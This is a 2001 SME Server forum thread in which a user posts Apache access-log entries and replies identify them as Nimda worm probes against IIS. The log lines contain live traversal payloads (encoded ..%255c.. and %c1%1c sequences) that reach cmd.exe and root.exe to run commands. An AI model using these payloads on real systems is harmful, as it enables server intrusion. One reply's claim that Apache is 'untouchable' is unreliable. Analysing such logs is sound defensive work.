Koozali.org: home of the SME Server

Legacy Forums => Experienced User Forum => Topic started by: Gert Andersen on November 27, 2001, 11:53:18 AM

Title: httpd/access entries
Post by: Gert Andersen on November 27, 2001, 11:53:18 AM

Hi

I have these entries in my access-log. Could someone please interpret these lines. I have a lot of of these entries.
Thanks
--------------------------------------------------------------------
www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:13 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:15 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:16 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:17 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:19 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:20 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:21 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"

-
-
-

Title: Re: httpd/access entries
Post by: WXP on November 27, 2001, 12:14:34 PM

I cant help you much but it seems like a IIS worm is trying to do some stuff :)

> GET /c/winnt/system32/cmd.exe?/c+dir

Don't worry Apache is untouchable !

Cya

Title: Re: httpd/access entries
Post by: Jon Blakely on November 27, 2001, 12:38:28 PM

Its the Nimda Worm. As WXP has said it only affects unpatched Microsoft IIS servers.
Apart from being a waste of bandwidth and log space it is harmless.

Jon